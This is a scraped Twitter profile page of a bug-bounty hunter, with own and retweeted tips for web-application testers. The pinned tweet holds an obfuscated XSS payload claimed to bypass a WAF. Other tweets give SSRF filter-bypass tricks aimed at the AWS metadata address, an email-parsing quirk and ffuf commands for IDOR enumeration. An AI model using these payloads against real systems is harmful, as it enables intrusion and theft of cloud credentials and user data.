Nick || hunt4p1zza

@ngkogkos

I find bugs for 🍕.

United Kingdom
Vrijeme pridruživanja: prosinac 2011.
54 fotografije ili videozapisa Fotografije i videozapisi

Tweetovi

Blokirali ste korisnika/cu @ngkogkos

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @ngkogkos

  1. Prikvačeni tweet
    19. lis 2019.

    Just ate a well-known WAF for breakfast. <form><button formaction=javascript:top['ev'+'al'](self['\x61\x74\x6f\x62'](`YWxlcnQoMSk7`));// See picture for detailed explanation and tips. Kudos: , , .

    1 reply 266 proslijeđenih tweetova 640 korisnika označava da im se sviđa
    Poništi
  2. proslijedio/la je Tweet
    4. velj

    If during your scans, the Backslash Powered Scanner plugin finds something like this. Try changing COM1 value for different numerical values, the result may surprise you. In this way I was able to extract registered users from an application.

    16 proslijeđenih tweetova 67 korisnika označava da im se sviđa
    Poništi
  3. proslijedio/la je Tweet
    3. velj

    When testing for SSRF, change the HTTP version from 1.1 to HTTP/0.9 and remove the host header completely. This has worked to bypass several SSRF fixes in the past.

    19 replies 463 proslijeđena tweeta 1.446 korisnika označava da im se sviđa
    Poništi
  4. proslijedio/la je Tweet
    4. velj

    When testing for SSRF using a black list, take internal IP addresses and when encoding them, dont encode entire IP. Encode 1 octet of the IP address, or 2 or 3. For Instance: AWS Metadata - 0251.254.169.254 (this got the $160,000 payout in Oct 2018)

    11 replies 284 proslijeđena tweeta 963 korisnika označavaju da im se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  5. 3. velj

    Do you have a big file w/ URLs w/ many of them being default pages, wildcards etc? Use 's get-title hack to grep out common titles: cat urls.txt | get-title -c 300 > titles.txt cat titles.txt | grep -v "PATTERN" | awk -F '[()]' '{print $2}'

    12 proslijeđenih tweetova 46 korisnika označava da im se sviđa
    Poništi
  6. proslijedio/la je Tweet
    3. velj

    Give a man an open redirect, and you feed him for a day. Teach a man to chain open redirects with other bugs, and you feed him for a lifetime.

    8 replies 27 proslijeđenih tweetova 217 korisnika označava da im se sviđa
    Poništi
  7. 2. velj

    Awesome chain of bugs to !

    WooT! There is always a way. New short write up! Chain the bugs till you get what you want. Some steps were not mentionned. RT, Like and Comments are appreciated. For any pentest work DM me:) 🎉🎉
    Prikaži ovu nit
    1 proslijeđeni tweet 8 korisnika označava da im se sviđa
    Poništi
  8. proslijedio/la je Tweet
    1. velj

    It's a little different from what I thought. The overall function is similar to the taborator, but it may be useful if you are configuring the private collaborator. I think it's cool that the collaborator stays even after the session ends 👍 cc)

    1 reply 2 proslijeđena tweeta 2 korisnika označavaju da im se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  9. proslijedio/la je Tweet
    30. sij

    An Interesting Account Takeover: 😃 Credits: ❤️💥🤘

    6 replies 90 proslijeđenih tweetova 272 korisnika označavaju da im se sviđa
    Poništi
  10. 30. sij

    IDEA 💡To create a web app vuln scanning framework with from . This can be simply a bash script with many scanning functions (files, SQLi etc), essentially multiple wrappers over . I will be away from PC a lot the following months, so I may write it in paper.

    6 proslijeđenih tweetova 19 korisnika označava da im se sviđa
    Poništi
  11. 29. sij

    Pure awesomeness

    ffuf 1.0 released! phew, this is a big one. Feature highlights in this thread Huge thanks for all the contributors, and special thanks to for pulling off a feature bounty and for fulfilling it in a record time (and contributing said bounty to charity).
    Prikaži ovu nit
    1 proslijeđeni tweet 1 korisnik označava da mu se sviđa
    Poništi
  12. proslijedio/la je Tweet
    28. sij

    Hey everyone, we are looking for speakers for this year. If you have any interesting topic to speak about and want to try how it feels to be on the stage just DM this account or shoot an email to any of CZ chapter leaders. RTs are appreciated.

    1 reply 12 proslijeđenih tweetova 16 korisnika označava da im se sviđa
    Poništi
  13. proslijedio/la je Tweet
    27. sij

    Practicing or on a daily basis? Based in in Europe? Don't miss the opportunity to take my Burp Suite Pro training in 2020, either in Geneva (March) or Amsterdam (April)

    11 proslijeđenih tweetova 14 korisnika označava da im se sviđa
    Poništi
  14. proslijedio/la je Tweet
    27. sij

    Did you know that the address '<a@b.com>c@d.com' when given to SES will send an email to a@b.com? this could lead to interesting exploit scenarios with some email parsing libraries/code

    127 proslijeđenih tweetova 343 korisnika označavaju da im se sviđa
    Poništi
  15. 23. sij

    🧐🧐🧐What?!?! It also works in all modern browsers.

    2 proslijeđena tweeta 14 korisnika označava da im se sviđa
    Poništi
  16. proslijedio/la je Tweet
    22. sij

    New blog post: A Less Known Attack Vector, Second Order IDOR Attacks

    100 proslijeđenih tweetova 266 korisnika označava da im se sviđa
    Poništi
  17. 21. sij

    I've been followed by , my career is now fulfilled and I can retire😊.

    1 proslijeđeni tweet 7 korisnika označava da im se sviđa
    Poništi
  18. proslijedio/la je Tweet
    20. sij

    Here's how the new Taborator feature works if my RT wasn't clear. If you send a request like: This will colour the interaction green in Taborator and add a comment of Chrome and change the text colour to white.

    5 proslijeđenih tweetova 27 korisnika označava da im se sviđa
    Poništi
  19. 20. sij

    I am thinking.. I need a password manager for my master passwords. Having split password databases with different master passwords for isolation reasons is not great when you realise you have to remember multiple complex passphrases that you may end up forgetting one day.

    1 proslijeđeni tweet 4 korisnika označavaju da im se sviđa
    Poništi
  20. 19. sij

    To process JSON results output by ffuf you can use the jq tool. You can use a bash alias similar to below depending on your needs: alias jqffuf="jq -r '.results[] | [.url,.redirectlocation,.status,.length] | \"\(.[0]) -> \(.[1]) \(.[2]) \(.[3])\"'"

    If you want to fuzz sequential numbers when looking for , you can easily do this with . Here's a real (sanitised) example in bash: $ seq 1000 8000 | ffuf -u -o ffuf_idor.txt -v -w -
    11 proslijeđenih tweetova 32 korisnika označavaju da im se sviđa
    Poništi
  21. 19. sij

    If you want to fuzz sequential numbers when looking for , you can easily do this with . Here's a real (sanitised) example in bash: $ seq 1000 8000 | ffuf -u -o ffuf_idor.txt -v -w -

    17 proslijeđenih tweetova 64 korisnika označavaju da im se sviđa
    Poništi

@ngkogkos još nije objavio nijedan Tweet.

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·